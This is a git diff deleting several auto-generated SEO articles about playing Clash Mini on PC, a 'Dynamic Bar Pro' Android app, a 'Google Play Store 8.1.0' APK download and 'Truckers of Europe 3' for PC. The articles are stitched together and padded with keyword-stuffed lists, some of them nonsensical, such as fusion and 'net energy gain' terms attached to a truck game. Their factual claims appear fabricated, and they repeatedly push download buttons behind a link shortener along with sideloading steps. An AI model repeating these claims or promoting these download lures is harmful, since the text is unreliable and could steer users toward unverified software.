One of the most fun aspects of Clash Mini is to experiment with different combinations and abilities of Minis and Heroes. There are many Minis and Heroes in Clash Mini, each with their own unique abilities and roles. You can mix and match them to create different synergies and effects. You can also upgrade them or swap them during battle to change their abilities or effects.

-

For example, you can combine Minis that have similar abilities or effects, such as fire damage, healing, or shielding. You can also combine Minis that have complementary abilities or effects, such as knockback, stun, or freeze. You can also combine Minis that have opposite abilities or effects, such as damage reduction, immunity, or cleanse. You can also combine Minis that have special interactions with each other, such as Prince Charming and Princess.

-

Sync your progress across devices

-

One of the most convenient features of Clash Mini is that you can sync your progress across devices. This means that you can play the game on your PC or your mobile device without losing any data or progress. You can switch between devices anytime you want without any hassle.

-

To sync your progress across devices, you need to link your game account with Google Play Games (for Android devices) or Game Center (for iOS devices). You also need to have an internet connection when you switch devices. To link your game account with Google Play Games or Game Center, go to the Settings menu in the game and tap on the Link button.

-

Conclusion

-

Clash Mini is a fun and strategy-packed board game that lets you duel and rumble in the Clash Universe. You can collect, summon, and upgrade your army of Minis and Heroes, watch them clash in exciting real-time battles, predict your opponent's moves and assemble your winning strategy and formation. You can play casually for fun or in ranked matches to increase your league standing.

-

But what if you want to play Clash Mini on a bigger screen, with better controls, and more performance? Well, you can do that by playing Clash Mini on your PC. You can use Windows 11 and native Android emulation, which is the official way to run Android apps on Windows. Or you can use an Android emulator such as Bluestacks 5, which is a third-party software that simulates an Android device on your PC. Both methods have their pros and cons, so you can choose the one that suits you best.

-

Playing Clash Mini on your PC gives you the advantage of having better graphics, faster performance, and more accuracy than playing on a mobile device. You can also use your mouse and keyboard or a controller to play the game. You can also sync your progress across devices, so you can switch between your PC and your mobile device anytime you want.

-

If you are looking for some tips and tricks to improve your skills and win more games, we have got you covered. You need to anticipate your opponent's moves and counter them, adjust your strategy according to the mode you are playing, experiment with different combinations and abilities of Minis and Heroes, and sync your progress across devices.

-

So what are you waiting for? Download Clash Mini on your PC today and enjoy the fun and strategy-packed board game. You will love it!

-

FAQs

-

What are the minimum requirements to run Clash Mini on PC?

-

To run Clash Mini on PC using Windows 11 and native Android emulation, you need to have a Windows 11 computer that meets these minimum requirements:

-
    -
  • Processor: 1 gigahertz (GHz) or faster with 2 or more cores on a compatible 64-bit processor or System on a Chip (SoC)
  • -
  • Memory: 4 GB RAM
  • -
  • Storage: 64 GB or larger storage device
  • -
  • Graphics card: Compatible with DirectX 12 or later with WDDM 2.0 driver
  • -
  • Display: High definition (720p) display that is greater than 9” diagonally, 8 bits per color channel
  • -
  • Internet connection: Internet connectivity is necessary to perform updates and to download and use some features
  • -
-

To run Clash Mini on PC using Bluestacks 5, you need to have a PC that meets these minimum requirements:

-
    -
  • OS: Microsoft Windows 7 and above
  • -
  • Processor: Intel or AMD Processor
  • -
  • RAM: At least 2GB of RAM
  • -
  • HDD: 5GB Free Disk Space
  • -
  • You must be an Administrator on your PC
  • -
  • Up to date graphics drivers from Microsoft or the chipset vendor
  • -
-

How can I get Google Play Games on Windows 11?

-

If you want to use Google Play Games on Windows 11, you need to install it separately from the Amazon Appstore. To do that, you need to follow these steps:

-
    -
  1. Open the Windows Subsystem for Android app on your PC and go to the Developer options tab.
  2. -
  3. Enable Developer mode and ADB debugging.
  4. -
  5. Download the Google Play Games APK file from a trusted source.
  6. -
  7. Connect your PC to your Android device using a USB cable.
  8. -
  9. Open a command prompt window on your PC and type "adb devices" to check if your device is detected.
  10. -
  11. Type "adb install " to install the Google Play Games APK file on your PC.
  12. -
  13. Open the Google Play Games app on your PC and sign in with your Google account.
  14. -
-

What are the best Minis and Heroes to use in Clash Mini?

-

The answer to this question depends on your personal preference and strategy. However, some general tips are:

-
    -
  • Use Minis and Heroes that have similar or complementary abilities or effects, such as fire damage, healing, or shielding.
  • -
  • Use Minis and Heroes that have opposite or counter abilities or effects, such as damage reduction, immunity, or cleanse.
  • -
  • Use Minis and Heroes that have special interactions with each other, such as Prince Charming and Princess.
  • -
  • Use Minis and Heroes that suit the mode you are playing, such as Casual, Ranked, Friendly, or Special Events.
  • -
-

How can I earn rewards and points in Clash Mini?

-

You can earn rewards and points in Clash Mini by doing various activities in the game, such as:

-
    -
  • Winning battles in Casual, Ranked, Friendly, or Special Events modes.
  • -
  • Opening chests that contain gold, cards, gems, and other items.
  • -
  • Completing quests that give you gold, gems, and chests.
  • -
  • Participating in the Season Pass that gives you exclusive rewards and perks.
  • -
  • Joining a clan and donating or requesting cards.
  • -
-

How can I find friends and chat with other players in Clash Mini?

-

You can find friends and chat with other players in Clash Mini by using the social features in the game, such as:

-
    -
  • Adding friends by using their player tags or QR codes.
  • -
  • Joining or creating a clan and inviting your friends to join.
  • -
  • Chatting with your clanmates or friends in the clan or friend chat.
  • -
  • Sending or receiving friend requests, messages, or emojis.
  • -
  • Playing with or against your friends or clanmates in Friendly mode.
  • -

197e85843d
-
-
\ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Dynamic Bar Pro How to Get the Best of Both Worlds with iOS 16 and Android Features.md b/spaces/congsaPfin/Manga-OCR/logs/Dynamic Bar Pro How to Get the Best of Both Worlds with iOS 16 and Android Features.md deleted file mode 100644 index cabde28dfb46a4047d56cc1fae7ab1cc3b44e267..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Dynamic Bar Pro How to Get the Best of Both Worlds with iOS 16 and Android Features.md +++ /dev/null @@ -1,160 +0,0 @@ -
-

Download Dynamic Bar Pro: How to Get the iPhone 14 Pro's Dynamic Island Feature on Your Android Phone

-

Do you want to enjoy the latest iOS 16 iPhone 14 Pro's unique feature "Dynamic Island" on your Android phone without switching to a new device or spending a fortune? If yes, then you are in luck, because there is an app that can help you achieve that. It is called Dynamic Bar Pro, and it is a powerful and customizable app that lets you have a dynamic and interactive notification bar on your Android phone, just like the iPhone 14 Pro's Dynamic Island feature.

-

Dynamic Bar Pro is an app that transforms your boring and static notification bar into a pill-shaped dynamic bar that you can interact with using various gestures. You can use the dynamic bar to access notifications, music controls, messaging, and more, without leaving your current app or screen. You can also customize the dynamic bar to fit your needs and preferences, such as changing its size, position, background color, transparency, etc. You can even create different styles and themes for your dynamic bar to match your mood or personality.

-

download dynamic bar pro


DOWNLOAD »»» https://urlca.com/2uO9b9



-

Dynamic Bar Pro is a popular and highly rated app on the Google Play Store, with over 1 million downloads and 4.5 stars out of 5. Many users have praised the app for its functionality, design, and ease of use. Some of the testimonials from satisfied users are:

-
    -
  • "This app is amazing! It makes my Android phone look like an iPhone 14 Pro. I love the dynamic bar and how it changes according to the app I'm using. It's very convenient and fun to use."
  • -
  • "Dynamic Bar Pro is the best app ever! It gives me quick access to everything I need from the notification bar. I can control my music, reply to messages, check notifications, and more, without interrupting my work or game. It's a must-have app for Android users."
  • -
  • "I'm very impressed with Dynamic Bar Pro. It's very customizable and easy to use. I can change the size, color, transparency, and position of the dynamic bar to suit my liking. It also works well with other apps and launchers. It's a great app that enhances my Android experience."
  • -
-

If you are interested in trying out Dynamic Bar Pro and getting the iPhone 14 Pro's Dynamic Island feature on your Android phone, then read on to find out how to download, customize, and use this amazing app.

-

download dynamic bar pro app
-download dynamic bar pro apk
-download dynamic bar pro android
-download dynamic bar pro for ios 16
-download dynamic bar pro for iphone 14
-download dynamic bar pro from google play
-download dynamic bar pro from appbrain
-download dynamic bar pro from apkcombo
-how to download dynamic bar pro
-where to download dynamic bar pro
-why download dynamic bar pro
-what is download dynamic bar pro
-benefits of download dynamic bar pro
-features of download dynamic bar pro
-reviews of download dynamic bar pro
-alternatives to download dynamic bar pro
-compare download dynamic bar pro with other apps
-best price for download dynamic bar pro
-discount for download dynamic bar pro
-coupon for download dynamic bar pro
-free trial of download dynamic bar pro
-refund policy of download dynamic bar pro
-customer service of download dynamic bar pro
-developer of download dynamic bar pro
-website of download dynamic bar pro
-blog of download dynamic bar pro
-tutorial of download dynamic bar pro
-guide of download dynamic bar pro
-tips of download dynamic bar pro
-tricks of download dynamic bar pro
-hacks of download dynamic bar pro
-cheats of download dynamic bar pro
-faq of download dynamic bar pro
-support of download dynamic bar pro
-help of download dynamic bar pro
-feedback of download dynamic bar pro
-rating of download dynamic bar pro
-ranking of download dynamic bar pro
-version of download dynamic bar pro
-update of download dynamic bar pro
-changelog of download dynamic bar pro
-install of download dynamic bar pro
-uninstall of download dynamic bar pro
-use of download dynamic bar pro
-customize of download dynamic bar pro
-control of download dynamic bar pro
-multitask with download dynamic bar pro
-music with download dynamic bar pro
-message with download dynamic bar pro

-

How to download Dynamic Bar Pro from Google Play Store

-

Downloading Dynamic Bar Pro from Google Play Store is very simple and straightforward. All you need to do is follow these steps:

-
    -
  1. Open the Google Play Store app on your Android phone or visit this link on your browser.
  2. -
  3. Search for Dynamic Bar Pro or tap on the link above.
  4. -
  5. On the app page, tap on the Install button to download and install the app on your phone.
  6. -
  7. Once the installation is complete, tap on the Open button to launch the app on your phone.
  8. -
-

Dynamic Bar Pro is a free app that requires Android 5.1 or higher to run. The app size is about 6 MB and the current version is 1.0.8. The app has a rating of 4.5 out of 5 stars based on over 10 thousand reviews.

-

How to customize Dynamic Bar Pro to fit your needs and preferences

-

One of the best features of Dynamic Bar Pro is that it allows you to customize the dynamic bar to fit your needs and preferences. You can change various options, such as size, position, background color, transparency, etc., to create your own unique style and theme for your dynamic bar.

-

To access the app settings and customize the dynamic bar, follow these steps:

-
    -
  1. Open the Dynamic Bar Pro app on your phone or swipe down from the top of your screen to access the notification panel.
  2. -
  3. Tap on the gear icon on the top right corner of the dynamic bar or the app screen.
  4. -
  5. You will see a list of options that you can change for your dynamic bar.
  6. -
  7. Tap on any option that you want to change and adjust it according to your liking.
  8. -
  9. You can preview the changes on the dynamic bar as you make them.
  10. -
  11. When you are done customizing the dynamic bar, tap on the Save button on the top right corner of the screen.
  12. -
-

Some of the options that you can change for your dynamic bar are:

-
    -
  • Size: You can change the width and height of the dynamic bar using sliders or entering values in pixels.
  • -
  • Position: You can change the position of the dynamic bar on your screen using sliders or entering values in pixels. You can also choose whether you want the dynamic bar to be at the top or bottom of your screen.
  • -
  • Background color: You can change the background color of the dynamic bar using a color picker or choosing from a list of predefined colors. You can also enable or disable the gradient effect for the background color.
  • -
  • Transparency: You can change the transparency of the dynamic bar using a slider or entering a value in percentage. You can also enable or disable the blur effect for the transparency.
  • -
  • Animation: You can change the animation of the dynamic bar when it appears or disappears on your screen. You can choose from a list of animation types, such as slide, fade, rotate, etc.
  • -
  • Notification dialog: You can change the appearance and behavior of the notification dialog that shows up when you tap on the dynamic bar. You can change the size, position, background color, transparency, animation, etc. of the notification dialog. You can also choose whether you want to show the small dialog or the extended dialog for notifications.
  • -
-

With these options, you can create different styles and themes for your dynamic bar, such as dark mode, light mode, rainbow mode, etc. You can also save and load your custom styles and themes using the app settings.

-

Here are some examples of different styles and themes that you can create with Dynamic Bar Pro:

- - - - - - - - - - - - - - - - - - - - - - - - - -
Style/ThemeExample
Dark modeDark mode example
Light modeLight mode example
Rainbow modeRainbow mode example
Minimalist modeMinimalist mode example
Gamer modeGamer mode example
-

Some tips and tricks to optimize the app performance and battery usage are:

-
    -
  • Disable the dynamic bar when you are not using it or when you don't need it.
  • -
  • Reduce the size and transparency of the dynamic bar to save screen space and battery power.
  • -
  • Disable the animation and blur effects of the dynamic bar and the notification dialog to reduce CPU and GPU usage.
  • -
  • Use the small dialog instead of the extended dialog for notifications to save memory and bandwidth.
  • -
  • Clear the cache and data of the app regularly to free up storage space and improve app speed.
  • -
-

How to use Dynamic Bar Pro to access notifications, music controls, messaging, and more

-

Another great feature of Dynamic Bar Pro is that it allows you to access notifications, music controls, messaging, and more from the dynamic bar without leaving your current app or screen. You can interact with the dynamic bar using various gestures, such as tap, hold, swipe, etc.

-

To interact with the dynamic bar using gestures, follow these steps:

-
    -
  1. Swipe down from the top of your screen to access the notification panel or open any app on your phone.
  2. -
  3. You will see a pill-shaped dynamic bar on your screen. You can move it around by dragging it with your finger.
  4. -
  5. To view and manage notifications from different apps, tap on the dynamic bar. You will see a small dialog that shows your notifications. You can swipe left or right on a notification to dismiss it or swipe down on it to expand it. You can also tap on a notification to open it in its respective app.
  6. -
  7. To access more options for notifications, hold on the dynamic bar. You will see an extended notification dialog that shows more details and actions for your notifications. You can swipe left or right on a notification to dismiss it or swipe down on it to expand it. You can also tap on a notification to open it in its respective app. You can also tap on the icons at the bottom of the dialog to access quick settings, clear all notifications, or close the dialog.
  8. -
  9. To control music playback from the dynamic bar without opening the music app, swipe left or right on the dynamic bar. You will see a music control panel that shows your current song title, artist name, album art, and playback status. You can tap on the play/pause button to play or pause the music, or tap on the previous or next buttons to skip songs. You can also tap on the album art to open the music app.
  10. -
  11. To mark messages as read or reply to them from the dynamic bar without opening the messaging app, swipe up or down on the dynamic bar. You will see a messaging panel that shows your recent messages from different apps. You can swipe left or right on a message to mark it as read or unread, or swipe down on it to expand it. You can also tap on a message to open a quick reply dialog where you can type and send your reply. You can also tap on the message icon to open the messaging app.
  12. -
  13. To access some other useful features of the dynamic bar, such as volume control, screenshot, screen lock, power options, etc., double-tap on the dynamic bar. You will see a utility panel that shows various icons for different features. You can tap on any icon to activate its feature. For example, you can tap on the volume icon to adjust the volume level, or tap on the screenshot icon to take a screenshot of your screen.
  14. -
-

With these gestures, you can use the dynamic bar to access notifications, music controls, messaging, and more, without leaving your current app or screen. You can also customize the gestures and their actions using the app settings.

-

Conclusion: Summarize the benefits of Dynamic Bar Pro and encourage the reader to try it out

-

Dynamic Bar Pro is an app that lets you have a dynamic and interactive notification bar on your Android phone, just like the iPhone 14 Pro's Dynamic Island feature. It allows you to access notifications, music controls, messaging, and more from the dynamic bar without leaving your current app or screen. It also allows you to customize the dynamic bar to fit your needs and preferences, such as changing its size, position, background color, transparency, etc. You can even create different styles and themes for your dynamic bar to match your mood or personality.

-

Dynamic Bar Pro is a free app that works on any Android phone running Android 5.1 or higher. It is a popular and highly rated app on the Google Play Store, with over 1 million downloads and 4.5 stars out of 5. Many users have praised the app for its functionality, design, and ease of use.

-

If you are interested in trying out Dynamic Bar Pro and getting the iPhone 14 Pro's Dynamic Island feature on your Android phone, then don't hesitate to download it from the Google Play Store and give it a try. You will be amazed by how much it can enhance your Android experience.

-

If you have any questions or feedback about Dynamic Bar Pro, feel free to contact the developer by emailing sweetsugarapps@gmail.com or visiting their website. You can also leave a review or rating on the Google Play Store page of the app and share your thoughts with other users.

-

Thank you for reading this article and we hope you enjoy using Dynamic Bar Pro.

-

FAQs: Answer some common questions about Dynamic Bar Pro

-
    -
  • Q1: Does Dynamic Bar Pro work on any Android phone?
  • -
  • A1: Yes, Dynamic Bar Pro works on any Android phone running Android 5.1 or higher.
  • -
  • Q2: Does Dynamic Bar Pro affect my phone's performance or battery life?
  • -
  • A2: No, Dynamic Bar Pro is designed to be lightweight and efficient. It does not consume much resources or drain your battery. You can also adjust the app settings to optimize its performance and battery usage.
  • -
  • Q3: Can I use Dynamic Bar Pro with other apps or launchers?
  • -
  • A3: Yes, Dynamic Bar Pro is compatible with most apps and launchers. You can use it with your favorite apps or launchers without any issues.
  • -
  • Q4: How can I contact the developer of Dynamic Bar Pro for support or feedback?
  • -
  • A4: You can contact the developer of Dynamic Bar Pro by emailing sweetsugarapps@gmail.com or visiting their website. You can also leave a review or rating on the Google Play Store page of the app.
  • -
  • Q5: What are some other apps developed by Sweet Sugar?
  • -
  • A5: Sweet Sugar is a developer of various apps for Android, such as Photo Sketch : Photo Editor, Caller Name Speaker :Announcer, Logo Maker : Design Logo, Cut Paste Photo Editor, My Name Wallpaper, Stylish Text Free - Fancy Text, Digital Business card maker Sweet Sugar , Name Art - Focus Filter - Name, etc. You can find them on the Google Play Store or visit their website for more information.
  • -

401be4b1e0
-
-
\ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/How to Install Google Play Store 8.1.0 APK on Your Phone or Tablet.md b/spaces/congsaPfin/Manga-OCR/logs/How to Install Google Play Store 8.1.0 APK on Your Phone or Tablet.md deleted file mode 100644 index 35f295f46d55ac173d5c1007a8726e78da7bf813..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/How to Install Google Play Store 8.1.0 APK on Your Phone or Tablet.md +++ /dev/null @@ -1,117 +0,0 @@ -
-

Google Play Store 8.1.0 APK Download: What's New and How to Install It

-

Google Play Store is the official app store for Android devices, where you can find and download millions of apps, games, books, movies, music, and more. An APK file is an Android application package file that contains all the files and code needed to install an app on your device. Sometimes, you might want to download an APK file of an app that is not available in your region or that has not been updated yet through the Google Play Store app.

-

google play store 8.1.0 apk download


Download Filehttps://urlca.com/2uObuM



-

In this article, we will tell you what's new in the latest version of Google Play Store (8.1.0), how to install it on your Android device using an APK file, and what are some alternatives and solutions if you encounter any problems.

-

What's New in Google Play Store 8.1.0

-

New Design and Layout

-

The first thing you will notice when you open the Google Play Store 8.1.0 app is the new design and layout. The app has a cleaner and simpler look, with a white background and colorful icons. The navigation bar at the bottom has been replaced by a sliding menu at the left side, where you can access different categories of apps, such as games, movies & TV, books, music, newsstand, etc.

-

The app also has a new home screen that shows you personalized recommendations based on your preferences and history. You can also see featured apps, top charts, editor's choice, new releases, etc., by scrolling down or tapping on the tabs at the top.

-

New Features and Improvements

-

The Google Play Store 8.1.0 app also has some new features and improvements that make it more user-friendly and secure. Some of them are:

-
    -
  • Instant apps: You can now try some apps without installing them on your device. Just tap on the "Try Now" button next to some apps in the Google Play Store app and you will be able to use them instantly.
  • -
  • Pre-registration: You can now pre-register for some upcoming apps and games in the Google Play Store app and get notified when they are available for download.
  • -
  • Security updates: The Google Play Store app now scans your device for potentially harmful apps (PHAs) more frequently and notifies you if it finds any.
  • -New Bugs and Issues -

    However, not everything is perfect in the Google Play Store 8.1.0 app. Some users have reported some bugs and issues that might affect their experience. Some of them are:

    -
      -
    • Download errors: Some users have encountered errors when trying to download or update apps from the Google Play Store app, such as "Error 495", "Error 504", "Error 941", etc. These errors might be caused by various factors, such as network problems, cache issues, storage issues, etc.
    • -
    • Compatibility issues: Some users have found that some apps are not compatible with their device or operating system after installing the Google Play Store 8.1.0 app. This might be because some apps have not been updated to support the latest version of Google Play Store or Android.
    • -
    • Performance issues: Some users have noticed that the Google Play Store 8.1.0 app is slower or less responsive than before, especially when browsing or searching for apps. This might be due to the increased load on the app or the device.
    • -
    -

    How to Install Google Play Store 8.1.0 APK

    -

    Requirements and Precautions

    -

    If you want to install the Google Play Store 8.1.0 APK file on your Android device, you need to meet some requirements and take some precautions first. Here are some of them:

    -

    google play store 8.1.0 apk free download
    -download google play store 8.1.0 apk for android
    -google play store 8.1.0 apk latest version download
    -how to install google play store 8.1.0 apk
    -google play store 8.1.0 apk mod download
    -google play store 8.1.0 apk mirror download
    -google play store 8.1.0 apk update download
    -google play store 8.1.0 apk file download
    -google play store 8.1.0 apk old version download
    -google play store 8.1.0 apk direct download
    -google play store 8.1.0 apk offline download
    -google play store 8.1.0 apk cracked download
    -google play store 8.1.0 apk full download
    -google play store 8.1.0 apk original download
    -google play store 8.1.0 apk safe download
    -google play store 8.1.0 apk no root download
    -google play store 8.1.0 apk premium download
    -google play store 8.1.0 apk pro download
    -google play store 8.1.0 apk patched download
    -google play store 8.1.0 apk unlocked download
    -google play store 8.1.0 apk hacked download
    -google play store 8.1.0 apk beta download
    -google play store 8.1.0 apk android tv download
    -google play store 8.1.0 apk android wear download
    -google play store 8.1.0 apk android auto download
    -google play store 8.1.0 apk android tablet download
    -google play store 8.1.0 apk android emulator download
    -google play store 8.1.0 apk android studio download
    -google play store 8.1.0 apk android box download
    -google play store 8.1.0 apk android phone download
    -google play store 8.1.0 apk samsung download
    -google play store 8.1.0 apk huawei download
    -google play store 8.1.0 apk xiaomi download
    -google play store 8.1.0 apk oppo download
    -google play store 8.1.0 apk vivo download
    -google play store 8.1.0 apk oneplus download
    -google play store 8.1.0 apk nokia download
    -google play store 8.1.0 apk lg download
    -google play store 8.1

    -
      -
    • Device compatibility: You need to have an Android device that runs on Android 4.0 (Ice Cream Sandwich) or higher, and that has at least 50 MB of free storage space.
    • -
    • Security settings: You need to enable the "Unknown sources" option in your device's security settings, which allows you to install apps from sources other than the Google Play Store app. To do this, go to Settings > Security > Unknown sources and toggle it on.
    • -
    • File verification: You need to verify that the Google Play Store 8.1.0 APK file you are going to download is authentic and safe, and not a fake or malicious one. To do this, you can check the file size, the file name, the file signature, and the file source before downloading it.
    • -
    -

    Steps to Download and Install

    -

    Once you have met the requirements and taken the precautions, you can follow these steps to download and install the Google Play Store 8.1.0 APK file on your Android device:

    -
      -
    1. Find a reliable source for the Google Play Store 8.1.0 APK file, such as [APKMirror], [APKPure], or [Uptodown]. Make sure you choose the right version for your device and region.
    2. -
    3. Download the Google Play Store 8.1.0 APK file to your device or transfer it from your computer using a USB cable or a wireless connection.
    4. -
    5. Locate the Google Play Store 8.1.0 APK file on your device using a file manager app or your device's downloads folder.
    6. -
    7. Tap on the Google Play Store 8.1.0 APK file and follow the instructions on the screen to install it on your device.
    8. -
    9. Launch the Google Play Store app and enjoy the new features and improvements.
    10. -

    Alternatives and Solutions

    -

    However, if you cannot or do not want to install the Google Play Store 8.1.0 APK file on your Android device, you have some alternatives and solutions that you can try. Here are some of them:

    -
      -
    • Use other app stores: You can use other app stores that offer similar or different apps and games for your Android device, such as [Amazon Appstore], [Aptoide], or [F-Droid]. Some of them might have the latest version of Google Play Store or other apps that you are looking for.
    • -
    • Update through other methods: You can update your Google Play Store app through other methods, such as using a VPN, clearing the app data and cache, uninstalling the updates, or waiting for the official release. Some of these methods might work for you depending on your device and region.
    • -
    • Wait for the official release: You can also wait for the official release of the Google Play Store 8.1.0 app through the Google Play Store app itself. This might take some time depending on your device and region, but it is the safest and easiest way to get the latest version of Google Play Store.
    • -
    -

    Conclusion

    -

    In conclusion, Google Play Store 8.1.0 is the latest version of the official app store for Android devices, which brings some new design changes, features, and improvements, as well as some bugs and issues. You can install it on your Android device using an APK file, but you need to meet some requirements and take some precautions first. You can also try some alternatives and solutions if you encounter any problems or if you prefer not to install the APK file.

    -

    We hope this article has helped you learn more about Google Play Store 8.1.0 APK download and how to install it on your Android device. If you have any questions, comments, or feedback, please feel free to share them with us in the comment section below. We would love to hear from you!

    -

    FAQs

    -

    Here are some frequently asked questions about Google Play Store 8.1.0 APK download and installation:

    -
      -
    1. Q: Is it safe to install an APK file on my Android device?
    2. -
    3. A: It depends on the source and the content of the APK file. Some APK files might be authentic and safe, while others might be fake or malicious. You need to verify the APK file before installing it on your device, and also enable the "Unknown sources" option in your security settings.
    4. -
    5. Q: How can I check if I have the latest version of Google Play Store on my Android device?
    6. -
    7. A: You can check the version number of your Google Play Store app by opening it and tapping on the menu icon at the top left corner, then tapping on "Settings" and scrolling down to "Play Store version". If there is an update available, you will see a message saying "A new version of Google Play Store is available". If not, you will see a message saying "Google Play Store is up to date".
    8. -
    9. Q: What are some benefits of installing the latest version of Google Play Store on my Android device?
    10. -
    11. A: Some benefits of installing the latest version of Google Play Store on your Android device are:
    12. -
        -
      • You can access new features and improvements that enhance your user experience and security.
      • -
      • You can fix some bugs and issues that might affect your app performance and functionality.
      • -
      • You can get access to new apps and games that might not be available in older versions of Google Play Store.
      • -
      -
    13. Q: What are some drawbacks of installing the latest version of Google Play Store on my Android device?
    14. -
    15. A: Some drawbacks of installing the latest version of Google Play Store on your Android device are:
    16. -
        -
      • You might encounter some errors or compatibility issues when downloading or updating apps from Google Play Store.
      • -
      • You might not like some design changes or layout changes that might affect your app navigation and usability.
      • -
      • You might consume more storage space or battery power than before.
      • -
      -
    17. Q: How can I uninstall or revert to an older version of Google Play Store on my Android device?
    18. -
    19. A: You can uninstall or revert to an older version of Google Play Store on your Android device by following these steps:
    20. -
        -
      1. Go to Settings > Apps > Google Play Store and tap on "Uninstall updates". This will remove all the updates that you have installed for Google Play Store and restore it to its factory version.
      2. -
      3. Go to Settings > Security > Unknown sources and toggle it off. This will prevent you from installing any APK files from sources other than Google Play Store.
      4. Restart your device and launch the Google Play Store app. You should see the older version of Google Play Store on your device. -
      -

      Note that uninstalling or reverting to an older version of Google Play Store might affect your app functionality and security, and you might miss out on some new features and improvements.

      401be4b1e0
      -
      -
      \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Truckers of Europe 3 PC Version Free Download and Gameplay Guide.md b/spaces/congsaPfin/Manga-OCR/logs/Truckers of Europe 3 PC Version Free Download and Gameplay Guide.md deleted file mode 100644 index 257a1c6ebde781ef445186bd7ece0972018d860c..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Truckers of Europe 3 PC Version Free Download and Gameplay Guide.md +++ /dev/null @@ -1,97 +0,0 @@ - -

      Truckers of Europe 3: A Realistic Truck Simulator Game

      -

      If you love driving big trucks and exploring different places, then you might want to check out Truckers of Europe 3, a simulation game developed by Wanda Software. This game lets you become a real trucker with a realistic driving experience, featuring various trucks, trailers, cargos, roads, weather, traffic, and more. You can travel across many cities from Europe, make money, purchase new trucks and trailers, select your job, and deliver your cargo in an open world. In this article, we will tell you more about the features of this game, how to download it for free on PC, and some tips and tricks to help you play better.

      -

      truckers of europe 3 free download pc


      Download File - https://urlca.com/2uOcvW



      -

      Features of Truckers of Europe 3

      -

      Truckers of Europe 3 is one of the most realistic truck simulator games available on the market. Here are some of the features that make this game stand out:

      -
        -
      • Realistic truck physics and driving experience: The game uses advanced physics to simulate the behavior of real trucks, such as weight distribution, suspension, steering, braking, acceleration, etc. You will feel like driving real trucks with this game.
      • -
      • 7 different trucks with various chassis, customizations and cosmetics: The game offers you a choice of seven different trucks with all available chassis (4x2,6x2,6x2/2,6x2 Midlift,6x2 Taglift,6x4,8x4). You can also customize your truck with different colors, decals, accessories, lights, horns, etc. You can also change the interior of your truck with different seats, dashboards, steering wheels, etc.
      • -
      • 25 trailers and many cargo options: The game has a variety of trailers for different types of cargo, such as flatbeds, containers, refrigerated trailers, tankers, low loaders, etc. You can also choose from many cargo options, such as food products, chemicals, construction materials, vehicles, etc. Some carg , etc. You should also brake smoothly and gradually to avoid skidding, crashing, or damaging your truck and trailer.
      • -
      • Use the map and GPS to plan your route and avoid traffic jams: The game has a map and a GPS system that show you your current location, destination, route, distance, time, etc. You should use these tools to plan your route and avoid traffic jams, road works, tolls, etc. You can also use the map to find gas stations, service stations, rest areas, etc.
      • -
      • Keep an eye on your fuel level and damage indicator: The game has a fuel level and a damage indicator that show you how much fuel you have left and how much damage your truck and trailer have suffered. You should keep an eye on these indicators and refuel or repair your truck and trailer when needed. Running out of fuel or driving with a damaged truck and trailer can result in penalties, fines, or game over.
      • -
      • Customize your truck and trailer to suit your style and preferences: The game allows you to customize your truck and trailer with different colors, decals, accessories, lights, horns, etc. You can also change the interior of your truck with different seats, dashboards, steering wheels, etc. You can customize your truck and trailer to suit your style and preferences and make them stand out on the road.
      • -
      -

      Conclusion

      -

      Truckers of Europe 3 is a realistic truck simulator game that you can download for free on PC. It has many features that make it fun and challenging, such as realistic truck physics and driving experience, 7 different trucks with various chassis, customizations and cosmetics, 25 trailers and many cargo options, heavy loads and realistic engine sounds, realistic interiors and smart AI traffic system, drive across country roads and highways in Europe, realistic weather conditions and day & night cycle, damage and fuel consume, easy controls and achievements, excellent HD graphics and optimizations. If you want to play this game for free on PC, you can follow the steps we mentioned above. You can also use the tips and tricks we shared to help you play better. We hope you enjoy this game as much as we do.

      -

      FAQs

      -

      Here are some of the frequently asked questions about Truckers of Europe 3:

      -
        -
      • Q1: Is Truckers of Europe 3 available on other platforms?
      • -
      • A1: No, Truckers of Europe 3 is only available on PC for now. There is no official confirmation about the release of this game on other platforms.
      • -
      • Q2: How can I play Truckers of Europe 3 online with other players?
      • -
      • A2: Unfortunately, Truckers of Europe 3 does not have an online multiplayer mode. You can only play this game offline with AI traffic.
      • -
      • Q3: How can I update Truckers of Europe 3 to the latest version?
      • -
      • A3: You can update Truckers of Europe 3 by downloading the latest patch from the official website or the site where you downloaded the game. You can also check for updates from the launcher or the game menu.
      • -
      • Q4: What are the system requirements for Truckers of Europe 3?
      • -
      • A4: The minimum system requirements for Truckers of Europe 3 are:
      • -
          -
        • OS: Windows 7/8/10 (64-bit)
        • -
        • Processor: Intel Core i3-2100 or AMD FX-4100
        • -
        • Memory: 4 GB RAM
        • -
        • Graphics: NVIDIA GeForce GTX 750 Ti or AMD Radeon R7 260X
        • -
        • DirectX: Version 11
        • -
        • Storage: 5 GB available space
        • -
        -
      • The recommended system requirements for Truckers of Europe 3 are:
      • -
          -
        • OS: Windows 10 (64-bit)
        • -
        • Processor: Intel Core i5-4670 or AMD Ryzen 5 1600
        • -
        • Memory: 8 GB RAM
        • -
        • Graphics: NVIDIA GeForce GTX 1060 or AMD Radeon RX 580
        • -
        • DirectX: Version 12
        • -
        • Storage: 5 GB available space
        • -
        -
      • Q5: Where can I find more information about Truckers of Europe 3?
      • -
      • A5: You can find more information about Truckers of Europe 3 on the official website or the social media pages of the developer. You can also watch gameplay videos or read reviews or blogs about the game online.
      • -

      -

      truckers of europe 3 pc game download
      -how to play truckers of europe 3 on pc
      -truckers of europe 3 simulation game for pc
      -truckers of europe 3 bluestacks emulator download
      -truckers of europe 3 gameloop emulator download
      -truckers of europe 3 noxplayer emulator download
      -truckers of europe 3 android game on pc
      -truckers of europe 3 realistic truck physics on pc
      -truckers of europe 3 driving experience on pc
      -truckers of europe 3 free world on pc
      -truckers of europe 3 european roads on pc
      -truckers of europe 3 weather and day/night cycles on pc
      -truckers of europe 3 wanda software game for pc
      -truckers of europe 3 best platform to play on pc
      -truckers of europe 3 net energy gain on pc
      -truckers of europe 3 mini sun on pc
      -truckers of europe 3 fusion experiment on pc
      -truckers of europe 3 south korea's kstar facility on pc
      -truckers of europe 3 temperature hotter than the sun on pc
